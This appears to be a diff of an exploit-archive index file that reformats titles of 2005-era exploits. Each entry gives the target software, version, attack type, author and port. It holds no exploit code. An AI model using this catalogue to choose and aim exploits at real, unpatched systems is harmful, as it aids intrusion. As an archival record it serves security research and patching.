990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow",2005-05-17,nolimit,windows,remote,20031 @@ -836,7 +836,7 @@ id,file,description,date,author,platform,type,port 1023,platforms/php/webapps/1023.pl,"myBloggie 2.1.1 < 2.1.2 - SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - javascript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos,0 -1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit",2005-06-02,"Jerome Athias",windows,remote,143 +1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 - (imap) Remote Buffer Overflow Exploit",2005-06-02,"Jerome Athias",windows,remote,143 1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service Exploit",2005-06-02,ATmaCA,windows,dos,0 1028,platforms/windows/remote/1028.c,"Crob FTP Server <= 3.6.1 - Remote Stack Overflow Exploit",2005-06-03,"Leon Juranic",windows,remote,0 1029,platforms/linux/local/1029.c,"ePSXe <= 1.6.0 nogui() Local Exploit",2005-06-04,Qnix,linux,local,0 @@ -856,7 +856,7 @@ id,file,description,date,author,platform,type,port 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1046,platforms/aix/local/1046.c,"AIX 5.2 - paginit Local Root Exploit",2005-06-14,intropy,aix,local,0 -1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 (addschup) Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080 +1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - (addschup) Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080 1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart web_store.cgi Remote Exploit",2005-06-15,"Action Spider",cgi,webapps,0 1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 Fetch Password Hash Remote Exploit",2005-06-15,pokleyzz,php,webapps,0 1050,platforms/php/webapps/1050.pl,"PHP Arena <= 1.1.3 pafiledb.php Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 @@ -865,7 +865,7 @@ id,file,description,date,author,platform,type,port 1053,platforms/php/webapps/1053.pl,"Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit (2)",2005-06-19,K-C0d3r,php,webapps,0 1055,platforms/linux/remote/1055.c,"PeerCast <= 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 1056,platforms/multiple/dos/1056.pl,"Apache <= 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 -1057,platforms/php/webapps/1057.pl,"Simple Machines Forum <= 1.0.4 (modify) SQL Injection Exploit",2005-06-21,"James Bercegay",php,webapps,0 +1057,platforms/php/webapps/1057.pl,"Simple Machines Forum <= 1.0.4 - (modify) SQL Injection Exploit",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard <= 1.1.4 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 1059,platforms/php/webapps/1059.pl,"WordPress <= 1.5.1.1 - 'add new admin' SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 @@ -878,17 +878,17 @@ id,file,description,date,author,platform,type,port 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0 1068,platforms/php/webapps/1068.pl,"PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit",2005-06-25,mh_p0rtal,php,webapps,0 -1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0 -1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0 +1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 - (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0 +1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 - (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows)",2005-06-27,"Marco Del Percio",multiple,dos,0 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 - ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 -1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 +1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"WordPress <= 1.5.1.2 - xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 -1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 +1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 - (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer (javaprxy.dll) COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 -1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 +1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0 1082,platforms/php/webapps/1082.pl,"XOOPS <= 2.0.11 xmlrpc.php SQL Injection Exploit",2005-07-04,RusH,php,webapps,0 1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (2)",2005-07-04,dukenn,php,webapps,0 @@ -925,20 +925,20 @@ id,file,description,date,author,platform,type,port 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0 1118,platforms/windows/remote/1118.c,"SlimFTPd <= 3.16 - Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21 -1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit",2005-07-25,"Georgi Guninski",multiple,local,0 -1120,platforms/cgi/webapps/1120.pl,"FtpLocate <= 2.02 (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 +1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - (modlines) Local Command Execution Exploit",2005-07-25,"Georgi Guninski",multiple,local,0 +1120,platforms/cgi/webapps/1120.pl,"FtpLocate <= 2.02 - (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 1121,platforms/windows/dos/1121.pl,"FTPshell Server <= 3.38 - Remote Denial of Service Exploit",2005-07-26,"Reed Arvin",windows,dos,0 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 -1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 +1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup Auto Scanner / Exploiter",2005-08-03,cybertronic,windows,remote,6070 -1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 -1134,platforms/php/webapps/1134.pl,"MySQL Eventum <= 1.5.5 (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0 +1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 - (Template) Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 +1134,platforms/php/webapps/1134.pl,"MySQL Eventum <= 1.5.5 - (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0 1135,platforms/php/webapps/1135.c,"PHP-Fusion <= 6.0 106 BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service Exploit",2005-08-05,basher13,windows,dos,0 1138,platforms/linux/remote/1138.c,"nbSMTP <= 0.99 - 'util.c' Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 @@ -949,16 +949,16 @@ id,file,description,date,author,platform,type,port 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 -1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,anonymous,windows,remote,10000 +1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows)",2005-08-11,anonymous,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,anonymous,windows,remote,1761 1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,anonymous,windows,remote,143 -1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 iMonitor Remote Stack Overflow",2005-08-12,anonymous,windows,remote,8008 +1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow",2005-08-12,anonymous,windows,remote,8008 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit",2005-08-12,"Pierre Kroma",hardware,dos,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 DoS Exploit",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat <= 0.95 Alpha - Remote Denial of Service Exploit",2005-08-18,RusH,cgi,dos,0 -1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 +1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 - (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 @@ -967,10 +967,10 @@ id,file,description,date,author,platform,type,port 1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 - Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 -1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 +1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0 1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Local Root Exploit",2001-07-13,"Charles Stevenson",linux,local,0 -1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 (Expires Header) Remote Buffer Overflow Exploit",2005-08-22,c0ntex,linux,remote,0 +1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow Exploit",2005-08-22,c0ntex,linux,remote,0 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-08-22,Alpha_Programmer,php,webapps,0 1173,platforms/windows/local/1173.c,"Mercora IMRadio <= 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 1174,platforms/windows/local/1174.c,"ZipTorrent <= 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 @@ -985,15 +985,15 @@ id,file,description,date,author,platform,type,port 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (2)",2005-08-30,basher13,windows,remote,80 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 - Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 - (-lib) Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 -1187,platforms/linux/local/1187.c,"Gopher <= 3.0.9 (+VIEWS) Remote (Client Side) Buffer Overflow Exploit",2005-08-30,vade79,linux,local,0 +1187,platforms/linux/local/1187.c,"Gopher <= 3.0.9 - (+VIEWS) Remote (Client Side) Buffer Overflow Exploit",2005-08-30,vade79,linux,local,0 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager <= 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 1189,platforms/php/webapps/1189.c,"vBulletin <= 3.0.8 Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 -1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 (Client Agent) Remote Exploit",2005-08-31,jpno5,windows,remote,6129 +1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - (Client Agent) Remote Exploit",2005-08-31,jpno5,windows,remote,6129 1191,platforms/php/webapps/1191.pl,"Simple PHP Blog <= 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 -1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 (command) Denial of Service Exploit",2005-09-02,basher13,windows,dos,0 +1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service Exploit",2005-09-02,basher13,windows,dos,0 1193,platforms/windows/remote/1193.pl,"Free SMTP Server <= 2.2 Spam Filter",2005-09-02,basher13,windows,remote,0 1194,platforms/cgi/webapps/1194.c,"man2web <= 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 -1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 +1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 - (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 - Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 @@ -1004,23 +1004,23 @@ id,file,description,date,author,platform,type,port 1207,platforms/php/webapps/1207.php,"Class-1 Forum <= 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily <= 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 -1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 USER Buffer Overflow Exploit",2005-09-11,y0,windows,remote,1000 +1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool <= 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort <= 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit",2005-09-12,nitr0us,multiple,dos,0 1214,platforms/php/webapps/1214.php,"AzDGDatingLite <= 2.1.3 - Remote Code Execution Exploit",2005-09-13,rgod,php,webapps,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 - (iwconfig) Local Root Exploit (some setuid)",2005-09-14,Qnix,linux,local,0 -1217,platforms/php/webapps/1217.pl,"phpWebSite <= 0.10.0 (module) SQL Injection Exploit",2005-09-15,RusH,php,webapps,0 +1217,platforms/php/webapps/1217.pl,"phpWebSite <= 0.10.0 - (module) SQL Injection Exploit",2005-09-15,RusH,php,webapps,0 1218,platforms/windows/dos/1218.c,"Stoney FTPd Denial of Service Exploit (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 -1219,platforms/php/webapps/1219.c,"PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit",2005-09-16,RusH,php,webapps,0 -1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server <= 7.1.2 (HEAD) DoS Exploit",2005-09-16,karak0rsan,windows,dos,0 -1221,platforms/php/webapps/1221.php,"CuteNews <= 1.4.0 (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 +1219,platforms/php/webapps/1219.c,"PHP-Nuke <= 7.8 - (modules.php) SQL Injection Exploit",2005-09-16,RusH,php,webapps,0 +1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server <= 7.1.2 - (HEAD) DoS Exploit",2005-09-16,karak0rsan,windows,dos,0 +1221,platforms/php/webapps/1221.php,"CuteNews <= 1.4.0 - (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command DoS Exploit",2005-09-19,basher13,windows,dos,0 1223,platforms/windows/remote/1223.c,"Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit",2005-09-20,c0d3r,windows,remote,143 1224,platforms/windows/remote/1224.html,"Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (2)",2005-09-22,Skylined,windows,remote,0 -1225,platforms/php/webapps/1225.php,"My Little Forum <= 1.5 (searchstring) SQL Injection Exploit",2005-09-22,rgod,php,webapps,0 -1226,platforms/php/webapps/1226.php,"phpMyFAQ <= 1.5.1 (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 -1227,platforms/php/webapps/1227.php,"MailGust <= 1.9 (board takeover) SQL Injection Exploit",2005-09-24,rgod,php,webapps,0 +1225,platforms/php/webapps/1225.php,"My Little Forum <= 1.5 - (searchstring) SQL Injection Exploit",2005-09-22,rgod,php,webapps,0 +1226,platforms/php/webapps/1226.php,"phpMyFAQ <= 1.5.1 - (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 +1227,platforms/php/webapps/1227.php,"MailGust <= 1.9 - (board takeover) SQL Injection Exploit",2005-09-24,rgod,php,webapps,0 1229,platforms/linux/local/1229.sh,"Qpopper <= 4.0.8 - (poppassd) Local Root Exploit (Linux)",2005-09-24,kingcope,linux,local,0 1230,platforms/bsd/local/1230.sh,"Qpopper <= 4.0.8 - (poppassd) Local Root Exploit (freebsd)",2005-09-24,kingcope,bsd,local,0 1231,platforms/linux/remote/1231.pl,"WzdFTPD <= 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 @@ -1028,21 +1028,21 @@ id,file,description,date,author,platform,type,port 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox <= 1.0.7 - Integer Overflow Denial of Service Exploit",2005-09-26,"Georgi Guninski",multiple,dos,0 1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit (fbsd)",2005-09-26,"Angelo Rosiello",bsd,remote,143 1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 -1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 Command Execution Exploit (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 -1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 (msg_send) SQL Injection Exploit",2005-09-28,rgod,php,webapps,0 -1238,platforms/linux/remote/1238.c,"Prozilla <= 1.3.7.4 (ftpsearch) Results Handling Buffer Overflow Exploit",2005-10-02,taviso,linux,remote,8080 +1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution Exploit (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 +1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - (msg_send) SQL Injection Exploit",2005-09-28,rgod,php,webapps,0 +1238,platforms/linux/remote/1238.c,"Prozilla <= 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow Exploit",2005-10-02,taviso,linux,remote,8080 1239,platforms/windows/dos/1239.c,"Virtools Web Player <= 3.0.0.100 - Buffer Overflow DoS Exploit",2005-10-02,"Luigi Auriemma",windows,dos,0 -1240,platforms/php/webapps/1240.php,"Utopia News Pro <= 1.1.3 (news.php) SQL Injection Exploit",2005-10-06,rgod,php,webapps,0 -1241,platforms/php/webapps/1241.php,"Cyphor <= 0.19 (board takeover) SQL Injection Exploit",2005-10-08,rgod,php,webapps,0 -1242,platforms/linux/remote/1242.pl,"xine-lib <= 1.1 (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 +1240,platforms/php/webapps/1240.php,"Utopia News Pro <= 1.1.3 - (news.php) SQL Injection Exploit",2005-10-06,rgod,php,webapps,0 +1241,platforms/php/webapps/1241.php,"Cyphor <= 0.19 - (board takeover) SQL Injection Exploit",2005-10-08,rgod,php,webapps,0 +1242,platforms/linux/remote/1242.pl,"xine-lib <= 1.1 - (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 1243,platforms/windows/remote/1243.c,"CA iGateway (debug mode) Remote Buffer Overflow Exploit",2005-10-10,egm,windows,remote,5250 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Remote Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 -1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 (board takeover) SQL Injection Exploit",2005-10-10,rgod,php,webapps,0 -1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 (Hijacking Command) Denial of Service Exploit",2005-10-11,basher13,windows,dos,0 -1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 +1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection Exploit",2005-10-10,rgod,php,webapps,0 +1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service Exploit",2005-10-11,basher13,windows,dos,0 +1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 1248,platforms/solaris/local/1248.pl,"Solaris 10 - DtPrintinfo/Session Local Root Exploit (x86)",2005-10-12,"Charles Stevenson",solaris,local,0 -1250,platforms/php/webapps/1250.php,"w-Agora <= 4.2.0 (quicklist.php) Remote Code Execution Exploit",2005-10-14,rgod,php,webapps,0 -1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server <= 1.11 (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 +1250,platforms/php/webapps/1250.php,"w-Agora <= 4.2.0 - (quicklist.php) Remote Code Execution Exploit",2005-10-14,rgod,php,webapps,0 +1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server <= 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit",2005-10-15,nukedx,asp,webapps,0 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 - Remote Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 @@ -1050,27 +1050,27 @@ id,file,description,date,author,platform,type,port 1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 -1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server Preauthentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 +1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Preauthentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 1260,platforms/windows/remote/1260.pm,"Microsoft Windows IIS - SA WebAgent 5.2/5.3 Redirect Overflow Exploit (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 -1261,platforms/hp-ux/remote/1261.pm,"HP-UX <= 11.11 lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 -1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 CAM log_security() Stack Overflow Exploit (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 -1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (Win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup <= 6.0 